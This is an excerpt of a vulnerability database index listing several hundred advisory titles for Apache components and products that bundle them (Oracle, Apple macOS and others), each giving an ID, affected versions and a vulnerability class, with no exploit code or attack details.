11453| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
11454| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
11455| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
11456| [112114] Oracle 9.1 Apache Log4j privilege escalation
11457| [112113] Oracle 9.1 Apache Log4j privilege escalation
11458| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
11459| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
11460| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
11461| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
11462| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
11463| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
11464| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
11465| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
11466| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
11467| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
11468| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
11469| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
11470| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
11471| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
11472| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
11473| [110701] Apache Fineract Query Parameter sql injection
11474| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
11475| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
11476| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
11477| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
11478| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
11479| [110106] Apache CXF Fediz Spring cross site request forgery
11480| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
11481| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
11482| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
11483| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
11484| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
11485| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
11486| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
11487| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
11488| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
11489| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
11490| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
11491| [108938] Apple macOS up to 10.13.1 apache denial of service
11492| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
11493| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
11494| [108935] Apple macOS up to 10.13.1 apache denial of service
11495| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
11496| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
11497| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
11498| [108931] Apple macOS up to 10.13.1 apache denial of service
11499| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
11500| [108929] Apple macOS up to 10.13.1 apache denial of service
11501| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
11502| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
11503| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
11504| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
11505| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
11506| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
11507| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
11508| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
11509| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
11510| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
11511| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
11512| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
11513| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
11514| [108782] Apache Xerces2 XML Service denial of service
11515| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
11516| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
11517| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
11518| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
11519| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
11520| [108629] Apache OFBiz up to 10.04.01 privilege escalation
11521| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
11522| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
11523| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
11524| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
11525| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
11526| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
11527| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
11528| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
11529| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
11530| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
11531| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
11532| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
11533| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
11534| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
11535| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
11536| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
11537| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
11538| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
11539| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
11540| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
11541| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
11542| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
11543| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
11544| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
11545| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
11546| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
11547| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
11548| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
11549| [107639] Apache NiFi 1.4.0 XML External Entity
11550| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
11551| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
11552| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
11553| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
11554| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
11555| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
11556| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
11557| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
11558| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
11559| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
11560| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
11561| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
11562| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
11563| [107197] Apache Xerces Jelly Parser XML File XML External Entity
11564| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
11565| [107084] Apache Struts up to 2.3.19 cross site scripting
11566| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
11567| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
11568| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
11569| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
11570| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
11571| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
11572| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
11573| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
11574| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
11575| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
11576| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
11577| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
11578| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
11579| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
11580| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
11581| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
11582| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
11583| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
11584| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
11585| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
11586| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
11587| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
11588| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
11589| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
11590| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
11591| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
11592| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
11593| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
11594| [105878] Apache Struts up to 2.3.24.0 privilege escalation
11595| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
11596| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
11597| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
11598| [105643] Apache Pony Mail up to 0.8b weak authentication
11599| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
11600| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
11601| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
11602| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
11603| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
11604| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
11605| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
11606| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
11607| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
11608| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
11609| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
11610| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
11611| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
11612| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
11613| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
11614| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
11615| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
11616| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
11617| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
11618| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
11619| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
11620| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
11621| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
11622| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
11623| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
11624| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
11625| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
11626| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
11627| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
11628| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
11629| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
11630| [103692] Apache OpenMeetings 1.0.0 Tomcat Error information disclosure
11631| [103691] Apache OpenMeetings 3.2.0 Parameter privilege escalation
11632| [103690] Apache OpenMeetings 1.0.0 sql injection
11633| [103689] Apache OpenMeetings 1.0.0 crossdomain.xml privilege escalation
11634| [103688] Apache OpenMeetings 1.0.0 weak encryption
11635| [103687] Apache OpenMeetings 1.0.0 cross site request forgery
11636| [103556] Apache Roller 5.1.0/5.1.1 Weblog Page Template VTL privilege escalation
11637| [103554] Apache OpenMeetings 1.0.0 Password Update unknown vulnerability
11638| [103553] Apache OpenMeetings 1.0.0 File Upload privilege escalation
11639| [103552] Apache OpenMeetings 3.2.0 Chat cross site scripting
11640| [103551] Apache OpenMeetings 3.1.0 XML unknown vulnerability
11641| [103521] Apache HTTP Server 2.4.26 HTTP2 Free memory corruption
11642| [103520] Apache HTTP Server up to 2.2.33/2.4.26 mod_auth_digest Authorization Header memory corruption
11643| [103519] Apache Struts up to 2.5.11/2.3.32 Spring AOP denial of service
11644| [103518] Apache Struts up to 2.5.11 URLValidator directory traversal
11645| [103492] Apache Spark up to 2.1.x Web UI Reflected cross site scripting
11646| [103401] Apache Struts 2.3.x Struts 1 Plugin ActionMessage privilege escalation
11647| [103399] Apache Traffic Control Traffic Router TCP Connection Slowloris denial of service
11648| [103387] Apache Impala up to 2.8.0 StatestoreSubscriber weak encryption
11649| [103386] Apache Impala up to 2.7.x/2.8.0 Kerberos weak authentication
11650| [103352] Apache Solr Node weak authentication
11651| [102897] Apache Ignite up to 2.0 Update Notifier information disclosure
11652| [102878] Code42 CrashPlan 5.4.x RMI Server org.apache.commons.ssl.rmi.DateRMI privilege escalation
11653| [102698] Apache HTTP Server up to 2.2.32/2.4.25 mod_mime Content-Type memory corruption
11654| [102697] Apache HTTP Server 2.2.24/2.2.32 HTTP Strict Parsing ap_find_token Request Header memory corruption
11655| [102690] Apache HTTP Server up to 2.2.32/2.4.25 mod_ssl ap_hook_process_connection() denial of service
11656| [102689] Apache HTTP Server up to 2.2.32/2.4.25 ap_get_basic_auth_pw weak authentication
11657| [102622] Apache Thrift up to 0.9.2 Client Libraries skip denial of service
11658| [102538] Apache Ranger up to 0.7.0 Authorizer unknown vulnerability
11659| [102537] Apache Ranger up to 0.7.0 Wildcard Character unknown vulnerability
11660| [102536] Apache Ranger up to 0.6 Stored cross site scripting
11661| [102535] Apache Ranger up to 0.6.2 Policy Engine unknown vulnerability
11662| [102255] Apache NiFi up to 0.7.3/1.2.x Response Header privilege escalation
11663| [102254] Apache NiFi up to 0.7.3/1.2.x UI cross site scripting
11664| [102070] Apache CXF Fediz up to 1.1.2/1.2.0 Application Plugin denial of service
11665| [102020] Apache Tomcat up to 9.0.0.M1 Java Servlet HTTP Method unknown vulnerability
11666| [101858] Apache Hive up to 1.2.1/2.0.0 Client weak authentication
11667| [101802] Apache KNOX up to 0.11.0 WebHDFS privilege escalation
11668| [101928] HPE Aruba ClearPass Apache Tomcat information disclosure
11669| [101524] Apache Archiva up to 1.x/2.2.1 REST Endpoint cross site request forgery
11670| [101513] Apache jUDDI 3.1./3.1.2/3.1.3/3.1.4 Logout Open Redirect
11671| [101430] Apache CXF Fediz up to 1.3.1 OIDC Service cross site request forgery
11672| [101429] Apache CXF Fediz up to 1.2.3/1.3.1 Plugins cross site request forgery
11673| [100619] Apache Hadoop up to 2.6.x HDFS Servlet unknown vulnerability
11674| [100618] Apache Hadoop up to 2.7.0 HDFS Web UI cross site scripting
11675| [100621] Adobe ColdFusion 10/11/2016 Apache BlazeDS Library Deserialization privilege escalation
11676| [100205] Oracle MySQL Enterprise Monitor up to 3.1.6.8003/3.2.1182/3.3.2.1162 Apache Commons FileUpload denial of service
11677| [100191] Oracle Secure Global Desktop 4.71/5.2/5.3 Web Server (Apache HTTP Server) information disclosure
11678| [100162] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Commons Collections privilege escalation
11679| [100160] Oracle StorageTek Tape Analytics SW Tool up to 2.2.0 Apache Trinidad unknown vulnerability
11680| [99969] Oracle WebCenter Sites 11.1.1.8.0 Apache Tomcat memory corruption
11681| [99937] Apache Batik up to 1.8 privilege escalation
11682| [99936] Apache FOP up to 2.1 privilege escalation
11683| [99935] Apache CXF up to 3.0.12/3.1.10 STSClient Cache information disclosure
11684| [99934] Apache CXF up to 3.0.12/3.1.10 JAX-RS XML Security Streaming Client spoofing
11685| [99930] Apache Traffic Server up to 6.2.0 denial of service
11686| [99929] Apache Log4j up to 2.8.1 Socket Server Deserialization privilege escalation
11687| [99925] Apache Traffic Server 6.0.0/6.1.0/6.2.0 HPACK Bomb denial of service
11688| [99738] Ping Identity OpenID Connect Authentication Module up to 2.13 on Apache Mod_auth_openidc.c spoofing
11689| [117569] Apache Hadoop up to 2.7.3 privilege escalation
11690| [99591] Apache TomEE up to 1.7.3/7.0.0-M2 EjbObjectInputStream Serialized Object privilege escalation
11691| [99370] Apache Ignite up to 1.8 update-notifier Document XML External Entity
11692| [99299] Apache Geode up to 1.1.0 Pulse OQL Query privilege escalation
11693| [99572] Apache Tomcat up to 7.0.75/8.0.41/8.5.11/9.0.0.M17 Application Listener privilege escalation
11694| [99570] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP Connector Cache information disclosure
11695| [99569] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 HTTP/2 GOAWAY Frame Resource Exhaustion denial of service
11696| [99568] Apache Tomcat up to 6.0.52/7.0.76/8.0.42/8.5.12/9.0.0.M18 Pipelined Request information disclosure
11697| [99048] Apache Ambari up to 2.3.x REST API Shell Metacharacter privilege escalation
11698| [99014] Apache Camel Jackson/JacksonXML privilege escalation
11699| [98610] Apple macOS up to 10.12.3 apache_mod_php memory corruption
11700| [98609] Apple macOS up to 10.12.3 apache_mod_php denial of service
11701| [98608] Apple macOS up to 10.12.3 apache_mod_php memory corruption
11702| [98607] Apple macOS up to 10.12.3 apache_mod_php denial of service
11703| [98606] Apple macOS up to 10.12.3 apache_mod_php denial of service
11704| [98605] Apple macOS up to 10.12.3 Apache denial of service
11705| [98604] Apple macOS up to 10.12.3 Apache denial of service
11706| [98603] Apple macOS up to 10.12.3 Apache denial of service
11707| [98602] Apple macOS up to 10.12.3 Apache denial of service
11708| [98601] Apple macOS up to 10.12.3 Apache denial of service
11709| [98517] Apache POI up to 3.14 OOXML File XXE denial of service
11710| [98405] Apache Hadoop up to 0.23.10 privilege escalation
11711| [98199] Apache Camel Validation XML External Entity
11712| [97892] Apache Tomcat up to 9.0.0.M15 Reverse-Proxy Http11InputBuffer.java information disclosure
11713| [97617] Apache Camel camel-snakeyaml Deserialization privilege escalation
11714| [97602] Apache Camel camel-jackson/camel-jacksonxml CamelJacksonUnmarshalType privilege escalation
11715| [97732] Apache Struts up to 2.3.31/2.5.10 Jakarta Multipart Parser Content-Type privilege escalation
11716| [97466] mod_auth_openidc up to 2.1.5 on Apache weak authentication
11717| [97455] mod_auth_openidc up to 2.1.4 on Apache weak authentication
11718| [97081] Apache Tomcat HTTPS Request denial of service
11719| [97162] EMC OpenText Documentum D2 BeanShell/Apache Commons privilege escalation
11720| [96949] Hanwha Techwin Smart Security Manager up to 1.5 Redis/Apache Felix Gogo privilege escalation
11721| [96314] Apache Cordova up to 6.1.1 on Android weak authentication
11722| [95945] Apple macOS up to 10.12.2 apache_mod_php denial of service
11723| [95944] Apple macOS up to 10.12.2 apache_mod_php denial of service
11724| [95943] Apple macOS up to 10.12.2 apache_mod_php memory corruption
11725| [95666] Oracle FLEXCUBE Direct Banking 12.0.0/12.0.1/12.0.2/12.0.3 Apache Commons Collections privilege escalation
11726| [95455] Apache NiFi up to 1.0.0/1.1.0 Connection Details Dialogue cross site scripting
11727| [95311] Apache Storm UI Daemon privilege escalation
11728| [95291] ZoneMinder 1.30.0 Apache httpd privilege escalation
11729| [94800] Apache Wicket up to 1.5.16/6.24.x Deserialize DiskFileItem denial of service
11730| [94705] Apache Qpid Broker for Java up to 6.1.0 SCRAM-SHA-1/SCRAM-SHA-256 User information disclosure
11731| [94627] Apache HTTP Server up to 2.4.24 mod_auth_digest Crash denial of service
11732| [94626] Apache HTTP Server up to 2.4.24 mod_session_crypto Padding weak encryption
11733| [94625] Apache HTTP Server up to 2.4.24 Response Split privilege escalation
11734| [94540] Apache Tika 1.9 tika-server File information disclosure
11735| [94600] Apache ActiveMQ up to 5.14.1 Administration Console cross site scripting
11736| [94348] Apple macOS up to 10.12.1 apache_mod_php denial of service
11737| [94347] Apple macOS up to 10.12.1 apache_mod_php denial of service
11738| [94346] Apple macOS up to 10.12.1 apache_mod_php denial of service
11739| [94345] Apple macOS up to 10.12.1 apache_mod_php denial of service
11740| [94344] Apple macOS up to 10.12.1 apache_mod_php denial of service
11741| [94343] Apple macOS up to 10.12.1 apache_mod_php memory corruption
11742| [94342] Apple macOS up to 10.12.1 apache_mod_php memory corruption
11743| [94128] Apache Tomcat up to 9.0.0.M13 Error information disclosure
11744| [93958] Apache HTTP Server up to 2.4.23 mod_http2 h2_stream.c denial of service
11745| [93874] Apache Subversion up to 1.8.16/1.9.4 mod_dontdothat XXE denial of service
11746| [93855] Apache Hadoop up to 2.6.4/2.7.2 HDFS Service privilege escalation
11747| [93609] Apache OpenMeetings 3.1.0 RMI Registry privilege escalation
11748| [93555] Apache Tika 1.6-1.13 jmatio MATLAB File privilege escalation
11749| [93799] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
11750| [93798] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 JmxRemoteLifecycleListener privilege escalation
11751| [93797] Apache Tomcat up to 6.0.47/7.0.72/8.0.38/8.5.6/9.0.0.M11 HTTP Split privilege escalation
11752| [93796] Apache Tomcat up to 8.5.6/9.0.0.M11 HTTP/2 Header Parser denial of service
11753| [93532] Apache Commons Collections Library Java privilege escalation
11754| [93210] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 ResourceLinkFactory privilege escalation
11755| [93209] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Realm Authentication User information disclosure
11756| [93208] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 System Property Replacement information disclosure
11757| [93207] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Utility Method privilege escalation
11758| [93206] Apache Tomcat up to 6.0.45/7.0.70/8.0.36/8.5.4/9.0.0.M9 Configuration privilege escalation
11759| [93098] Apache Commons FileUpload privilege escalation
11760| [92987] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Commons Collection memory corruption
11761| [92986] Oracle Virtual Desktop Infrastructure up to 3.5.2 Apache Tomcat memory corruption
11762| [92982] Oracle Insurance IStream 4.3.2 Apache Commons Collections memory corruption
11763| [92981] Oracle Financial Services Lending and Leasing 14.1.0/14.2.0 Apache Commons Collections memory corruption
11764| [92979] Oracle up to 8.0.3 Apache Commons Collections memory corruption
11765| [92977] Oracle FLEXCUBE Universal Banking up to 12.2.0 Apache Commons Collections memory corruption
11766| [92976] Oracle FLEXCUBE Universal Banking 12.87.1/12.87.2 Apache Commons Collections memory corruption
11767| [92975] Oracle FLEXCUBE Private Banking up to 12.1.0 Apache Commons Collections memory corruption
11768| [92974] Oracle FLEXCUBE Investor Servicing 12.0.1 Apache Commons Collections memory corruption
11769| [92973] Oracle 12.0.0/12.1.0 Apache Commons Collections memory corruption
11770| [92972] Oracle FLEXCUBE Core Banking 11.5.0.0.0/11.6.0.0.0 Apache Commons Collections memory corruption
11771| [92962] Oracle Agile PLM 9.3.4/9.3.5 Apache Commons Collections memory corruption
11772| [92909] Oracle Agile PLM 9.3.4/9.3.5 Apache Tomcat unknown vulnerability
11773| [92786] Oracle Banking Digital Experience 15.1 Apache Commons Collections information disclosure
11774| [92549] Apache Tomcat on Red Hat privilege escalation
11775| [92509] Apache Tomcat JK ISAPI Connector up to 1.2.41 jk_uri_worker_map.c memory corruption
11776| [92314] Apache MyFaces Trinidad up to 1.0.13/1.2.15/2.0.1/2.1.1 CoreResponseStateManager memory corruption
11777| [92313] Apache Struts2 up to 2.3.28/2.5.0 Action Name Cleanup cross site request forgery
11778| [92299] Apache Derby up to 10.12.1.0 SqlXmlUtil XML External Entity
11779| [92217] Apache ActiveMQ Artemis up to 1.3.x Broker/REST GetObject privilege escalation
11780| [92174] Apache Ranger up to 0.6.0 Policy cross site scripting
11781| [91831] Apache Jackrabbit up to 2.13.2 HTTP Header cross site request forgery
11782| [91825] Apache Zookeeper up to 3.4.8/3.5.2 C CLI Shell memory corruption
11783| [91818] Apache CXF Fediz up to 1.2.2/1.3.0 Application Plugin privilege escalation
11784| [92056] Apple macOS up to 10.11 apache_mod_php memory corruption
11785| [92055] Apple macOS up to 10.11 apache_mod_php memory corruption
11786| [92054] Apple macOS up to 10.11 apache_mod_php denial of service
11787| [92053] Apple macOS up to 10.11 apache_mod_php denial of service
11788| [92052] Apple macOS up to 10.11 apache_mod_php denial of service
11789| [92051] Apple macOS up to 10.11 apache_mod_php memory corruption
11790| [92050] Apple macOS up to 10.11 apache_mod_php denial of service
11791| [92049] Apple macOS up to 10.11 apache_mod_php memory corruption
11792| [92048] Apple macOS up to 10.11 apache_mod_php denial of service
11793| [92047] Apple macOS up to 10.11 apache_mod_php memory corruption
11794| [92046] Apple macOS up to 10.11 apache_mod_php memory corruption
11795| [92045] Apple macOS up to 10.11 apache_mod_php memory corruption
11796| [92044] Apple macOS up to 10.11 apache_mod_php memory corruption
11797| [92043] Apple macOS up to 10.11 apache_mod_php denial of service
11798| [92042] Apple macOS up to 10.11 apache_mod_php memory corruption
11799| [92041] Apple macOS up to 10.11 apache_mod_php memory corruption
11800| [92040] Apple macOS up to 10.11 Apache Proxy privilege escalation
11801| [91785] Apache Shiro up to 1.3.1 Servlet Filter privilege escalation
11802| [90879] Apache OpenMeetings up to 3.1.1 SWF Panel cross site scripting
11803| [90878] Apache Sentry up to 1.6.x Blacklist Filter reflect/reflect2/java_method privilege escalation
11804| [90610] Apache POI up to 3.13 XLSX2CSV Example OpenXML Document XML External Entity
11805| [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console privilege escalation
